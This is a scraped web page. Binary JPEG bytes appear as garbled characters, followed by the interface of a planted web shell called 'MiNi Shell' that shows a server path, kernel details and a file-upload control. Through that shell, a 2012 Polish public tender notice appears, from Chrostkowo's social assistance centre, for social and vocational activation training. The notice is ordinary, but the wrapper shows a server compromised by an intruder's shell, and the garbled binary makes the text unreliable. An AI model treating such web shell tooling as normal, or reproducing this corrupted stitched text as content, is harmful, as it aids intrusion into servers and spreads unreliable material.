JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120731/279206-N-2012.html

<p class="kh_header"><b>Chrostkowo: Kompleksowe usługi w zakresie aktywizacji społecznej, zawodowej i edukacyjnej dla uczestników projektu systemowego pt. Walka o godne jutro</b><br>
<b>Numer ogłoszenia: 279206 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej w Chrostkowie , Chrostkowo 99, 87-602 Chrostkowo, woj. kujawsko-pomorskie, tel. 54 287 00 39, faks 54 287 00 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopschrostkowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe usługi w zakresie aktywizacji społecznej, zawodowej i edukacyjnej dla uczestników projektu systemowego pt. Walka o godne jutro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dla 11 osób, z którymi zawarto kontrakty socjalne: 1.1 Spotkanie w ramach grupy samopomocowej nt. zarządzania budżetem domowym - Czas to pieniądz: 11 osób, 5 godz. - 1 dzień, w okresie wrzesień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa, zakres programu spotkania: zarządzaniem budżetem w gospodarstwie domowym, planowanie i monitorowanie potrzeb, planowanie i bilansowanie budżetu rodziny, efektywne sposoby oszczędzania na wydatkach domowych, jak ograniczać wydatki niekonieczne, gospodarowanie niewielkimi małymi pieniędzmi, jak radzić sobie w trudnych sytuacjach finansowanych?, Wykonawca zapewni:  wyżywienie,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e spotkanie, zaświadczenie o ukończeniu spotkania; 1.2 Warsztaty prawidłowego funkcjonowania rodziny: 11 osób, 24 godz., w okresie sierpień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa, zakres programu warsztatów: rola dorosłego w życiu człowieka; jaki powinien być dobry rodzic; kary i nagrody w wychowaniu, wychowanie bezstresowe, potrzeby dziecka, jak je zaspokoić i realizować; zasady i obowiązki w życiu dziecka; asertywność w kontakcie z dzieckiem; emocje w życiu i rozwoju dziecka, Wykonawca zapewni: wyżywienie,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e warsztaty, zaświadczenie o ukończeniu warsztatów; 1.3 Kurs Pomoc kuchenna: 11 osób, 42 godz., w okresie wrzesień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa lub gminy Chrostkowo, zakres programu kursu: zasady żywienia, BHP w małej gastronomii i gospodarstwie domowym, obróbka wstępna i cieplna surowców, sposoby dekorowania i podawania potraw, charakterystyka i zastosowanie w produkcji kulinarnej warzyw, ziemniaków, grzybów i owoców, przygotowywanie zup, potraw mięsnych (wieprzowe, wołowe, drobiowe), potraw mącznych, potraw rybnych, sałatek, surówek, deserów, pieczenie ciast, Wykonawca zapewni:  wyżywienie na zajęciach teoretycznych,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e kurs, zaświadczenie o ukończeniu kursu; 1.4 Warsztaty z doradcą zawodowym - indywidualny plan działania, 1 osoba, 4 godz. - 1 dzień, w okresie sierpień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa,  zakres programu warsztatów: m.in. słabe i mocne strony, określenie ścieżki rozwoju osobistego i kariery zawodowej, dokumenty aplikacyjne, Wykonawca zapewni: poczęstunek,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e warsztaty, zaświadczenie o ukończeniu warsztatów; 1.5  Indywidualna konsultacje z trenerem w zakresie komunikacji i motywacji, 1 osoba, 4 godz. - 1 dzień, w okresie sierpień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa,  zakres programu konsultacji: m.in.: komunikacja interpersonalna, komunikacja werbalna i niewerbalna, przeszkody i zakłócenia w komunikowaniu się, informacje zwrotne, umiejętność słuchania, rozpoznawanie i nazywanie uczuć własnych i innych osób, adekwatna samoocena i kontrolowanie wyrażania własnych uczuć, motywowanie do działania, Wykonawca zapewni: poczęstunek,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e konsultacje, zaświadczenie o ukończeniu konsultacji; 1.6  Wyjazd integracyjno - szkoleniowy, liczba osób: 12 kobiet i 16-ścioro dzieci oraz 1 opiekun (Zamawiający zastrzega sobie prawo do zmiany ilości dzieci, które wezmą udział w wyjeździe), 4 dni, sierpień 2012r., w odległości maksymalnie 75 km od Chrostkowa, na terenie zapewniającym atrakcje rekreacyjno - turystyczne, Wykonawca zapewni transport z Chrostkowa na miejsce realizacji wyjazdu i z powrotem, ubezpieczenie NNW uczestników wyjazdu na 4 dni, zakwaterowanie, całodobowe wyżywienie, stały dostęp do kawy, herbaty, wody gazowanej i niegazowanej, soków lub napojów owocowych, kubki jednorazowe do napojów gorących i zimnych, łyżeczki jednorazowe, cukier, śmietanka lub mleko, w razie potrzeby opiekę medyczną oraz pomoc w dotarciu do szpitala-pogotowia, bezpłatne korzystanie przez uczestników wyjazdu z bazy rekreacyjno - wypoczynkowej znajdującej się na terenie hotelu lub pensjonatu lub gospodarstwa agroturystycznego,  obsługę kulturalno - oświatową oraz zajęcia integracyjne, w tym m.in. wieczorek zapoznawczy, grill lub ognisko z pieczeniem kiełbasek, wycieczki oraz innego typu atrakcje miejscowe,  realizację 5 godz. spotkania w ramach grupy samopomocowej nt. zarządzania budżetem domowym - Czas to pieniądz (w podziale: pierwszy dzień - 3 godz. i czwarty dzień - 2 godz.; 1 godz. = 45 minut); realizację 8 godz. warsztatów prawidłowego funkcjonowania rodziny (w podziale drugi i trzeci dzień - po 4 godz.; 1 godz. = 45 minut);  zaświadczenia o uczestnictwie w wyjeździe i odbyciu spotkania oraz warsztatów, na 7 dni przed wyjazdem szczegółowy program wyjazdu do akceptacji przez Zamawiającego. 2. Dla 8 osób, z którymi zawarto umowy o udzielenie wsparcia w ramach Programu Aktywności Lokalnej 2.1 Trening kompetencji i umiejętności społecznych, 8 osób, 32 godz.  w okresie wrzesień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa, zakres programu szkolenia: budowanie postawy asertywnej; sytuacja psychologiczna osoby bezrobotnej; analiza motywacji do pracy, obrona swoich praw w sytuacjach społecznych, akceptacja siebie; wyrażanie próśb, żądań, oczekiwań i wydawanie poleceń, poczucie wartości-godności osoby bezrobotnej, radzenie sobie w sytuacjach trudnych tj. z chorobą, ze stresem, z koniecznością angażowania osób trzecich przy wykonywaniu podstawowych funkcji życiowych, Wykonawca zapewni: wyżywienie,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e trening, zaświadczenie o ukończeniu treningu; 2.2 Poradnictwo specjalistyczne (indywidualne konsultacje lekarskie): 8 osób, 2 konsultacje lekarskie na 1 osobę, termin konsultacji: w okresie wrzesień - grudzień 2012r., wskazane jest aby konsultacje były ustalone dla wszystkich osób na jeden dzień, realizacja konsultacji: miasto Włocławek lub miasto Toruń, Wykonawca zapewni: wynajem busa celem dowozu grupy na konsultacje, jeśli nie będzie możliwości ustalenia dla wszystkich osób konsultacji w jednym terminie, należy zapewnić konsultacje indywidualne wraz ze zwrotem kosztu dojazdu, Planowane są konsultacje lekarskie u następujących specjalistów: nefrolog + USG - 3 , urolog + USG - 6, neurochirurg - 2, kardiolog - 3, w tym jedna + ECHO serca, ginekolog - 2); Zamawiający zastrzega sobie prawo do zmiany rodzaju konsultacji lekarskich na etapie realizacji umowy, Wykonawca zapewni konsultacje u specjalistów w danej dziedzinie posiadających dyplom lekarski. 2.3 Poradnictwo grupowe w zakresie zdrowia, 8 osób, liczba osób: 8, liczba spotkań: 5,  każde poradnictwo musi trwać min. 1 godz. zegarową, maksimum 2 godz. zegarowe, termin realizacji: w okresie wrzesień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa, zakres spotkań poradnictwa grupowego: a) zdrowy tryb życia, b) nałogi - wpływ na zdrowie, c) choroby cywilizacyjne (depresja, nerwica, otyłość), d) serce-cholesterol-cukrzyca, e) alergia-astma-choroby płuc,  Zamawiający zastrzega sobie prawo do zmiany tematyki poradnictwa na etapie realizacji umowy, w tym do realizacji poradnictwa w zakresie tematyki cieszącej się największym zainteresowaniem,  poradnictwo będzie publicznie dostępne dla otoczenia uczestników projektu np. sąsiadów, czy mieszkańcy danej wsi, dlatego Zamawiający przewiduje ich udział w realizacji poradnictwa, Wykonawca zapewni: wyżywienie,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e poradnictwo, zaświadczenie o ukończeniu poradnictwa. 2.4 Indywidualne spotkania z psychologiem - indywidualne wsparcie w zakresie podniesienia kompetencji życiowych, 2 osoby, liczba godz. spotkań: 3 godz. na 1 osobę (1 godz. = 50 min.) w godz. 8.00 - 15.00, pn-pt,  termin realizacji: w okresie wrzesień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa,  Wykonawca zapewni: dostęp do serwisu kawowego (kawa sypana i rozpuszczalna, herbata czarna w torebkach, woda gazowana i niegazowana + czajniki lub termosy, kubki jednorazowe do napojów gorących i zimnych, łyżeczki jednorazowe, cukier, śmietanka lub mleko); osobę prowadzącą posiadającą: wykształcenie wyższe, kwalifikacje psychologa lub psychoterapeuty, doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym, salę do realizacji spotkań zapewnia Zamawiający. 2.5 Warsztaty z doradcą zawodowym, 8 osób, 32 godz., termin realizacji: w okresie wrzesień - grudzień 2012r., miejsce realizacji: na terenie Chrostkowa, zakres programu warsztatów: autoprezentacja, bilans umiejętności zawodowych, dokumenty aplikacyjne i rozmowa kwalifikacyjna, Wykonawca zapewni: wyżywienie,  materiały szkoleniowe, salę, obsługę techniczną, osobę-osoby prowadzącą-e warsztaty, zaświadczenie o ukończeniu warsztatów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość przeprowadzenia zamówień uzupełniających do 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 70.22.00.00-9, 55.32.10.00-6, 55.52.00.00-1, 85.10.00.00-0, 85.12.00.00-6, 55.27.00.00-3, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełnienia ww. warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał przynajmniej 2 kompleksowe usługi składających się co najmniej z treningu kompetencji społecznych, warsztatów z doradcą zawodowym oraz kursów zawodowych z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokument potwierdzającego, że usługi te zostały wykonane lub są wykonywane należycie - załącznik nr 5 do SIWZ
Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 3 osobami przewidzianymi do realizacji zamówienia lub dysponuje pisemnym zobowiązaniem innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia zgodnie z wymaganiami zawartymi w załączniku nr 1 do SIWZ wraz z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 6 do SIWZ 
Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełnienia ww. warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie Wykonawcy - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający przewiduje możliwość zmiany postanowień umowy (zgodnie z art. 144 ustawy PZP ) w przypadkach, gdy:
a) nastąpi zmiana przepisów wpływających na realizację przedmiotu zamówienia,
b) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie;
c) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej;
d) konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego;
e) z powodu okoliczności siły wyższej, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć w chwili zawarcia umowy;
f) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
g) zaistnieją okoliczności niezależne od Zamawiającego i Wykonawcy uzasadniające zmianę terminów realizacji przedmiotu umowy,
i) zaistnieją okoliczności niezależne od Zamawiającego i Wykonawcy, uzasadniające zmianę miejsca realizacji przedmiotu umowy, przy czym zmiana nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w Załączniku nr 1 do SIWZ Opis przedmiotu zamówienia
2. Zamawiający dopuszcza zmianę osoby/osób wykonujących zamówienie, ale jedynie w uzasadnionych przypadkach, w szczególności na wypadek choroby lub innej okoliczności uniemożliwiającej wykonywanie obowiązków wynikających z umowy. Zmiana osoby jest dopuszczalna pod warunkiem, że wskazana osoba (zastępca) posiada takie same lub wyższe kwalifikacje zawodowe.
3.W przypadku obiektywnie pojawiających się okoliczności Zamawiający dopuszcza zmianę ilości osób w poszczególnych punktach przedmiotu zamówienia. Przy czym Zamawiający zastrzega, że ogólna ilość osób przewidywana do objęcia wsparciem, zgodnie z Załącznikiem nr 1 (tj. łącznie 19 osób) nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chrostkowo.bipgmina.pl, www.gopschrostkowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Chrostkowie, Chrostkowo 99,         87 - 602 Chrostkowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2012 godzina 13:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Chrostkowie, Chrostkowo 99,         87 - 602 Chrostkowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Walka o godne jutro jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com